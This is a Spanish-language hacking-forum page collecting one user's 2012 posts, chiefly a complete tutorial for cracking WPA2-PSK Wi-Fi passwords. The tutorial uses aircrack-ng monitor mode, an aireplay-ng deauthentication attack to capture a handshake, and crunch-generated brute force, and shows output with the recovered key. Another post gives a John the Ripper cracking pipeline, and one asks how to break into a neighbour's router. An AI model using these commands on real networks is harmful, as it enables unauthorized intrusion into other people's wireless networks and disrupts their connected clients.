Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - On3

#1
Seguridad Wireless / Re:Ataque Evil Twin Attack
Diciembre 27, 2012, 10:49:05 PM
muy bueno, lo mirare y probare aber si me saliera bien XD
gracias por aportarlo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#2
Seguridad Wireless / Crunch "Explicacion escrita"
Diciembre 27, 2012, 02:02:51 AM
Hola, despues de probar con john the ripper, y aberme llebado un chasco bien grande al no optener la wpa2 psk,
os dejo este tuto de como utilizar crunch, que para mi, es una opcion valida.

Para quienes no lo tengais instalado en buestro linux, backtrack, wifislax... aqui para bajarlo e instalarlo , explicado :
CitarNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
despues de aberlo descargado ,procedemos a descomprimirlo:
tar -xvzf crunch*.tgz
Entramos al directorio
cd crunch
Lo compilamos, por si las moscas primero dejo el build-essential por si no lo teneis :
apt-get install build-essential
Aora si, lo compilamos:
make
make install
Por ultimo copiamos el comando al sbin:
cp crunch /usr/sbin/
para los que no tengais el aircrack "ai que tener instalado apt"
apt-get install aircrack-ng

sigamos,
Ponemos en modo (monitor) nuestra usb o tarjeta wifi (en mi caso la interfaz es wlan0, cada uno que ponga la suya "si no sabes cual es pones Iwconfig y listo"

escaneamos las redes, con el siguiente comando "acordarse de cambiar wlan0 por el buestro XD"

Código: text
airodump-ng wlan0


os aparecera lo siguiente :

C
Código: text
H  6 ][ Elapsed: 8 s ][ 2012-12-27 05:00 ]                                        
                                                                                                   
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                   
                                                                                                   
00:27:22:LB:88:3E  -89        3        0    0   6  54e  OPN              <length:  0>             
0W:27:22:LC:88:3E  -90        3        1    0   6  54e  WPA2 CCMP   PSK  0N3_wifi       
0T:27:22:LC:88:3E  -89        3        3    0   6  54e  WPA2 CCMP   MGT  Wlan_5145         
0A:26:24:86:LC:9D  -70        0        0    0  11  54e  WPA2 CCMP   PSK  Wifi_carlos
00:11:6B:4A:3C:A0  -68        2        0    0  11  54e. WPA2 TKIP   PSK  LevelOne2         


voy a usar es el  "default" que tiene cifrado WPA TKIP PSK:
TKIP: (Temporal Key Integrity Protocol)
PSK: (Pre-Shared Key)

Una vez que tenemos el MAC del AP y el canal, ponemos:

Código: text
airodump-ng -c NUMERODELCANAL --bssid MAC-DEL-AP -w default wlan0


En este caso:

Código: text
airodump-ng -c 6 --bssid 0W:27:22:LC:88:3E -w default wlan0


Ahora airodump solo va a escuchar ese canal y ese AP (en mi caso un usb nuevo que compre hoy,y puse en modo AP )

podemos hacer lo siguiente:

1) Esperar que se conecte un nuevo cliente para adquirir el handshake
2) Des autenticar un cliente ya conectado para que vuelva a conectarse y adquirir el handshake
en este caso aremos lo segundo ya que les pedi a mis hermanos que se conectaran para poder acerlo y mostrarlo
copiamos el MAC del AP y el MAC del cliente conectado en un txt mismo para no liarnos

AP:                               0W:27:22:LC:88:3E
Cliente Conectado:        0F:0C:FW:7A:67:D3

Procedemos a desautenticar al cliente mediante este comando:

Código: text
aireplay-ng -0 10 -a MAC-DEL-AP -c MAC-DEL-CLIENTE wlan0


en mi caso seria asi:

Código: text
aireplay-ng -0 10 -a  0W:27:22:LC:88:3E -c 0F:0C:FW:7A:67:D3 wlan0


Hace algo así:

Código: text
root@bt: aireplay-ng -0 10 -a 0W:27:22:LC:88:3E -c 0F:0C:FW:7A:67:D3 wlan0 
23:46:18 Waiting for beacon frame (BSSID:0W:27:22:LC:88:3E) on channel 6
23:46:19 Sending 64 directed DeAuth. STMAC: [0F:0C:FW:7A:67:D3] [ 1|173 ACKs]
23:46:20 Sending 64 directed DeAuth. STMAC: [0F:0C:FW:7A:67:D3] [14|155 ACKs]
23:46:20 Sending 64 directed DeAuth. STMAC: [0F:0C:FW:7A:67:D3] [ 0|207 ACKs]
23:46:21 Sending 64 directed DeAuth. STMAC: [0F:0C:FW:7A:67:D3] [11|173 ACKs]


Si no lo desautentifica a la primera, volver a repetir el comando.
Una vez que el usuario es desautenticado y vuelva a ingresar nos va a aparecer arriba a la derecha el handshake:

Código: text
CH 6 ][ Elapsed: 9 mins ][ 2012-12-27 05:20 ][ WPA handshake: 0W:27:22:LC:88:3E


Listo, ya tenemos el handshake, ahora utilizamos el crunch, escribimos esto:

Código: text
crunch 8 9 0123456789 | aircrack-ng -a 2 RUTA-DEL-ARCHIVO-CAP -e default -b HANDSHAKE -w -


En este caso: (yo movi el handshake a la carpeta "root" ustedes pongan su ruta)

Código: text
crunch 8 9 0123456789 | aircrack-ng -a 2 /root/0N3_wifi.cap  -e default -b 0W:27:22:LC:88:3E -w 


CitarAclaración: "crunch 8 9" hace referencia a que las claves WPA como mínimo tienen 8 caracteres, en este caso yo quiero que sólo pruebe hasta 9 caracteres, y que utilice los números 0123456789.
El 75% de los usuarios cometen el error de "asegurar" la red con WPA y usar claves numéricas, que en este caso vamos a ver lo fáciles que son de conseguir con crunch
Si quisiéramos que crunch use letras, pondríamos "crunch 8 15 (máximo 15 caracteres)" abcdefghijklmno"

Ahora vamos a ver como crunch empieza a generar claves y a probarlas con el aircrack-ng:

Código: text
crunch 8 9 0123456789 | aircrack-ng -a 2 /root/0N3_wifi.cap  -e default -b 0W:27:22:LC:88:3E -w 
Opening /root/0N3_wifi.cap
Reading packets, please wait...

Aircrack-ng 1.0 rc3


[00:00:50] 72172 keys tested (1445.33 k/s)


KEY FOUND! [ 00072169 ]


Master Key : F0 BE A1 08 A5 4C D6 E4 08 5C 5F B4 42 4A 69 F0
32 1D C9 11 D5 F3 BB 64 3D F2 31 AB FA F7 A7 1E

Transient Key : 72 42 D4 F0 91 91 E9 27 F8 8E D0 DF 1D 48 1B AD
16 10 78 D5 B1 7E 8D 9E 7A 76 68 AC 44 2A 37 94
30 4C 47 F5 FE EB 01 7E 8B 64 87 EF 78 3D 2F 1E
E8 6B 4A 2E E4 95 F4 57 4A 32 05 54 66 AA D6 98

EAPOL HMAC : C8 28 B2 83 87 05 18 45 D8 26 C0 42 1D AB A0 7D




Listo, ya tenemos la clave  que lo disfrutéis, como lo hice yo.
Saludos, 0N3.

PD:Siento las faltas de ortografía xD pero dado que son las 6 de la mañana, y voy adormilado, es lo que ai xD
Agradecería a un moderador que le pusiera una chincheta de esas y se quede en lo alto como los aportes de antrax, pues es un aporte también, "ya actualizare el post poniéndole imágenes" .

LOG DE MODERACION
Tema editado para mejorar su comprension.
cl0udswx 031120014

#3
el orden correcto y comandos correctos, al final entre nty "mas que nada el " consegui ver como el john empezo el proceso !!! Un urra por que porfin lo logre gracias a antrax, nty y Jimeno por su ultimo video donde coji los comandos siguientes menos el ultimo que es del antrax :p
ls
cd /pentest
ls
cd passwords
ls
cd john
ls
/john --stdout --incremental:all | aircrack-ng -b "Direccion mac del router de la captura" -w - "arrastrar captura"

gracias por ayudar : antrax, nty y Jimeno :p salu2
#4
antrax tu sabrias decirme donde guarda el wifite, de wifislax 4.3 el hand? cuando lo a capturado?? no lo encuentro :s
#5
 lo que necesitaria es el comando para despues de capturar el handk
la forma de comando indique al jhon the ripper que busque con todo
letras minusculas mayusculas nunmeros i signos...
podrias acerte un tuto en modo rapido aqui mismo si eso :s please antrax
#6
backtrack 5 r3 gnome no la iso "vmware" 32 bits
#7
La cosa es que la explicaste en modo rapido o con otra version de backtrack que la que yo uso :s
al leerlo casi no me empane de nada, ya sabes aprendo despazito :(
#8
una red con wpa 2 psk de R, con clabe cambiada, no la original
#9
ya busque pero la mita en chino salian y algunos los probe y no funcaron :( de todas maneras muchas gracias jimeno por el aporte :)
Y gracias al moderador que edito el post "casi ni lo encuentro xD"
#10
Hola, esto es una peticion para antrax pero si alguien lo sabe que lo responda "se lo agradezere bastante"
Antrax podrias decirme como se utiliza "John the Ripper" y si podrias dejar algunos comandos para usarlo :s
Gracias.
#11
Dudas y pedidos generales / Re:problemilla
Diciembre 23, 2012, 12:42:46 AM
la cosa es que ese necesita diccionarios y no tengo ninguno para ese tipo :S solo para wpa y wpa 2
#12
Dudas y pedidos generales / [SOLUCIONADO] Problemilla
Diciembre 23, 2012, 12:26:13 AM
hola esta es la puerta de enlaze del wifi de mi vecino, la cosa es k al intentar entrar me pide user y pass, antes eran ubnt y ubnt, pero el debio cambiar la pass, ai alguna forma de obtenerla o entrar?